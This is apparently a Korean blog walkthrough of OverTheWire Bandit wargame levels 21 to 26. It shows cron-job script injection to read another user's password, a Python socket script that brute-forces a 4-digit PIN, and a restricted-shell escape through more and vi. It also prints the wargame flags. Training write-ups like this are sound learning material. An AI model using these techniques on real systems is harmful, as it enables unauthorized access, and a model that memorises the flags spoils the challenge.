Post

Bandit 21 ~ 30

Wargame, Overthewire
Bandit Linux Commands
Posted

bandit21

1
2
3

A program is running automatically at regular intervals from cron, 
the time-based job scheduler. 
Look in /etc/cron.d/ for the configuration and see what command is being executed.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

bandit21@bandit:/etc/cron.d$ ls
cronjob_bandit15_root  cronjob_bandit17_root  cronjob_bandit22  cronjob_bandit23 
cronjob_bandit24  cronjob_bandit25_root

bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null

cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

bandit22

1
2
3

A program is running automatically at regular intervals from cron, 
the time-based job scheduler. 
Look in /etc/cron.d/ for the configuration and see what command is being executed.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:/etc/cron.d$ echo "I am user bandit23" | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

bandit23 (풀이 봄)

1
2
3
4
5
6
7
8
9

A program is running automatically at regular intervals from cron, 
the time-based job scheduler. 
Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. 
This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, 
        so you may want to keep a copy around…

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done
bandit23@bandit:/tmp/level23$ vi level23.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/level23/flag

bandit23@bandit:/tmp/level23$ chmod 777 level23.sh
bandit23@bandit:/tmp/level23$ cp level23.sh /var/spool/bandit24

이런 식으로 하려 했으나 level23 디렉토리의 권한이 bandit23에만 있어서 파일 생성이 불가능.

1
2
3
4
5
6
7
8

bandit23@bandit:/var/spool/bandit24$ vi a.sh
bandit23@bandit:/var/spool/bandit24$ chmod 777 a.sh
bandit23@bandit:/var/spool/bandit24$ ls -al flag
ls: cannot access 'flag': No such file or directory
bandit23@bandit:/var/spool/bandit24$ ls -al flag
-rw-r--r-- 1 bandit24 bandit24 33 Jul 13 13:13 flag
bandit23@bandit:/var/spool/bandit24$ cat flag
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

bandit24 (풀이 참고)

1
2
3
4

A daemon is listening on port 30002 and will give you the password for bandit25 
if given the password for bandit24 and a secret numeric 4-digit pincode. 
There is no way to retrieve the pincode 
except by going through all of the 10000 combinations, called brute-forcing.

소켓 프로그래밍을 하여 풀 수 있음.
파이썬으로 소켓 코딩

1
2
3
4
5
6
7
8
9
10
11

bandit24@bandit:~$ telnet localhost 30002
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0000
Wrong! Please enter the correct pincode. Try again.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 5562
Wrong! Please enter the correct pincode. Try again.
Timeout. Exiting.
Connection closed by foreign host.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

  1 #!/usr/bin/env python3                   
  2 #coding: utf-8                           
  3                                          
  4 import socket                            
  5 import sys                               
  6                                          
  7 host = 'localhost'                       
  8 port = 30002                             
  9                                          
 10 socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 11 socket.connect((host,port))              
 12 start_msg=socket.recv(1024)              
 13                                          
 14 print(start_msg)                         
 15 pwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"   
 16                                          
 17 for a in range(0,10) :                   
 18     for b in range(0,10) :               
 19         for c in range(0,10) :           
 20             for d in range(0,10) :       
 21                 pincode=str(a)+str(b)+str(c)+str(d)+'\n'
 22                 msg=pwd+' '+pincode      
 23                 socket.sendall(msg.encode('utf-8'))
 24                 recv=socket.recv(1024)   
 25                 recv_msg=recv.decode('utf-8')
 26                 if "Wrong!" not in recv_msg :
 27                     print(recv_msg)
 28                     socket.close()       
 29                     sys.exit(1)          
 30                 else :                   
 31                     print("False",pincode)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

bandit24@bandit:/tmp/lv24$ python3 brute.py
b'I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, 
separated by a space.\n'
False 0000

False 0001

False 0002

[redacted]

False 2586

False 2587
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

bandit25 (풀이 봄)

1
2
3

Logging in to bandit26 from bandit25 should be fairly easy… 
The shell for user bandit26 is not /bin/bash, but something else. 
Find out what it is, how it works and how to break out of it.

을 확인하는 방법은 다음과 같음.

1
2
3

1. grep 유저 /etc/passwd -> 유저의 쉘 확인
2. echo $SHELL -> 현재 사용하는 쉘 확인
3. cat /etc/shells -> 사용 가능한 쉘 확인 

1
2

bandit25@bandit:~$ grep bandit26 /etc/passwd
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

/etc/passwd의 필드에 대한 의미는 다음과 같음.
참고 : https://webdir.tistory.com/129

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

root:x:0:0:root:/root:/bin/bash
 1   2 3 4  5     6       7         

필드 1 : 사용자명

필드 2 : 패스워드(/etc/shadow 파일에 암호화되어 있음)

필드 3 : 사용자 계정 uid

필드 4 : 사용자 계정 gid

필드 5 : 사용자 계정 이름(정보)

필드 6 : 사용자 계정 홈 디렉토리

필드 7 : 사용자 계정 로그인 쉘

1
2
3
4
5
6
7

bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh

export TERM=linux  

more ~/text.txt    
exit 0

more은 출력하는 파일의 내용을 읽어 화면 단위로 끊어서 출력시켜주는 명령어.
Hyperputty보다 화면이 더 줄어들지 않아서 확대를 해서 화면을 줄였음.
more가 뜨면 v로 vi 상태가 되고 :e /etc/bandit_pass/bandit26하면 플래그 출력

1
2
3
4

bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost
v
:e /etc/bandit_pass/bandit26
1 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z

bandit26

1
2

Good job getting a shell! 
Now hurry and grab the password for bandit27!

1
2
3
4
5
6
7
8
9
10
11
12

bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost
v
:set shell=/usr/bin/bash
enter
!/bin/bash
bandit26@bandit:~$ ls
bandit27-do  text.txt
bandit26@bandit:~$ ./bandit27-do
Run a command as another user.  
Example: ./bandit27-do id
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea
Wargame, Overthewire
Bandit Linux Commands
This post is licensed under CC BY 4.0 by the author.